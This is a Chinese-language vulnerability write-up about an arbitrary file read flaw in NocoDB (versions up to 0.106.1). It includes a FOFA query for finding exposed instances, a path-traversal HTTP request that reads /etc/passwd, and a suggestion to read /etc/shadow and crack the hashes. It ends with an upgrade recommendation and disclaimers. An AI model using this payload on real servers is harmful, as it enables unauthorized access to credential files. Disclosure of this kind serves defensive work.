【无标题】

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

NocoDB 是 Airtable 的开源替代方案,可以"一键"将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。

二:漏洞影响版本

version<=0.106.1

三:网络空间测绘查询

fofa:

icon_hash="-2017596142"

四:漏洞复现

poc

复制代码
GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1

五:漏洞利用

可通过读取/etc/shadow读取到加密后的用户名密码,解密后进行后续测试工作

六:修复建议

及时更新至最新版本

复制代码
原文地址: https://www.freebuf.com/articles/web/379844.html

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

学习更多渗透技能!体验靶场实战练习

相关推荐
你无法关注此用户44 分钟前
华为设备OSPF配置与实战指南
运维·网络
试剂界的爱马仕1 小时前
软珊瑚成分 CI-A:靶向口腔癌细胞的 “氧化利剑” 与 ERK 密码
网络·人工智能·科技·机器学习·ci/cd·ai写作
gadiaola1 小时前
【计算机网络】第3章:传输层—面向连接的传输:TCP
网络·网络协议·tcp/ip·计算机网络
安全系统学习4 小时前
【网络安全】漏洞分析:阿帕奇漏洞学习
java·网络·安全·web安全·系统安全
小邓儿◑.◑4 小时前
C++初阶 | 模板
网络·c++·windows
链上Sniper4 小时前
Python 区块链开发实战:从零到一构建智能合约
开发语言·网络·python·架构·区块链·php·智能合约
领世达检测V133529092495 小时前
「EN 18031」访问控制机制(ACM - 1):智能路由器的安全守卫
网络·智能路由器
SZ1701102315 小时前
默认网关 -- 负责转发数据包到其他网络的设备(通常是路由器)
网络·智能路由器
2301_803449645 小时前
(eNSP)配置WDS手拉手业务
运维·服务器·网络
luojiezong5 小时前
极简以太彩光网络解决方案4.0正式发布,“彩光”重构园区网络极简之道
网络·重构